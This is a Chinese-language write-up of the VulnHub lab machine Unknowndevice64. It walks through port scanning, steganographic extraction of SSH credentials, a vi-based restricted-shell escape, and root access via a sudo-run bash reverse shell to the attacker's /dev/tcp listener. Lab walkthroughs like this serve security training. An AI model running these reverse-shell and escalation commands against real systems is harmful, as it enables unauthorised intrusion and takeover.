VulnHub渗透测试Unknowndevice64
测试环境
攻击IP | 说明 | 靶机IP |
---|---|---|
172.17.135.79 | pc | 172.17.135.64 |
172.17.135.75 | VM-kali | 172.17.135.64 |
测试前准备
搭好环境就直接访问80端口了,连接都没连接上,之后上kali,使用nmap扫描全部端口 使用命令:
nmap -T4 -A -sS -p 1-65535 -v 172.17.135.64
查询到端口如下:
端口 | 状态 | 服务 |
---|---|---|
31337/tcp | open | http |
1337/tcp | open | ssh |
根据nmap扫描可以很清楚的看到两个可疑的端口,对两个端口进行具体的分析
31337端口
首先访问: http://172.17.135.64:31337
查看源码
发现可以目录:key_is_h1dd3n.jpg
访问页面得到图片
根据目前获得的提示猜测该图片应为隐写图片,使用工具steghide
进行查看,猜测图片隐写的密码为主页显示的h1dd3n
steghide extract -sf key_is_h1dd3n.jpg -p h1dd3n
查看h1dd3n.txt
获取到一串编码
可以看出为brainfuck
编码,使用在线网站对改编码进行解码,获得:
ud64:1M!#64ei@ud
尝试用获取到的用户名和密码进行ssh连接
1337端口
使用ssh
进行连接
进行简单的查看目录时,发现大部分的常用命令都无法使用
所以下一步我们的思路是逃逸出去这种情形,在测试中我们发现vi
命令我们可以使用,不过写入/bin/bash
失败,并且sudo
命令无法使用,所以我们使用!/bin/bash
进入bash
在vi命令行下输入!/bin/bash
即可顺利进入bash
我们通过export
命令修改环境变量,从而让我们可以轻松的使用命令
bash-4.4$ export SHELL="/bin/bash"
bash-4.4$ export PATH="/usr/bin"
虽然此时可以使用sudo
命令但是此时切换用户仍然需要使用密码
所以我们使用反弹shell的方法进行提权
首先kali虚拟机监听4444端口
nc -lvp 4444
使用命令:
sudo sysud64 -uroot /bin/bash -c "/bin/sh -i >& /dev/tcp/172.17.135.75/4444 0>&1"
顺利提到root权限
获取flag